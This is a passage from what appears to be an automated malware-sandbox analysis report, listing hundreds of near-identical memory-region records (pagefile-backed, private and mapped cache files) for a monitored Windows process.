end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3152 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3153 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3154 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3155 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3156 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3157 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3158 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3159 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3160 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3161 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3162 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3163 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3164 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3165 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3166 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3167 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3168 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3169 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3170 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3171 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3172 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3173 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3174 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3175 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3176 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3177 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3178 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3179 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3180 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3181 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3182 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3183 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3184 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3185 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3186 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3187 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3188 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3189 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3190 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3191 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3192 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3193 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3194 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3195 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3196 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3197 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3198 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3199 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3200 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3201 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3202 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3203 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3204 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3205 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3206 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3207 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3208 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3209 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3210 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3211 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3212 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3213 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3214 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3215 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3216 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3217 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3218 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3219 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3220 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3221 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3222 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3223 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3224 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3225 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3226 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3227 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3228 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3229 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3230 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3231 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3232 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3233 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3234 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3235 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3236 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3237 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3238 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3239 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3240 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3241 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3242 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3243 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3244 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3245 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3246 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3247 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3248 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3249 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3250 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3251 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3252 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3253 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3254 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3255 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3256 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3257 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3258 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3259 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3260 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3261 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3262 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3263 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3264 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3265 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3266 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3267 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3268 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3269 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3270 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3271 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3272 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3273 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3274 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3275 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3276 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3277 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3278 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3279 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3280 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3281 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3282 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3283 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3284 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3285 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3286 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3287 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3288 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3289 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3290 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3291 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3292 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3293 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3294 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3295 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3296 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3297 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3298 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3299 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3300 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3301 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3302 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3303 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3304 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3305 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3306 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3307 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3308 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3309 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3310 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3311 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3312 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3313 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3314 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3315 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3316 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3317 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3318 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3319 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3320 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3321 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3322 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3323 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3324 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3325 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3326 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3327 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3328 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3329 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3330 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3331 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3332 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3333 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3334 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3335 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 3336 start_va = 0x460000 end_va = 0x477fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 3337 start_va = 0x440000 end_va = 0x457fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = 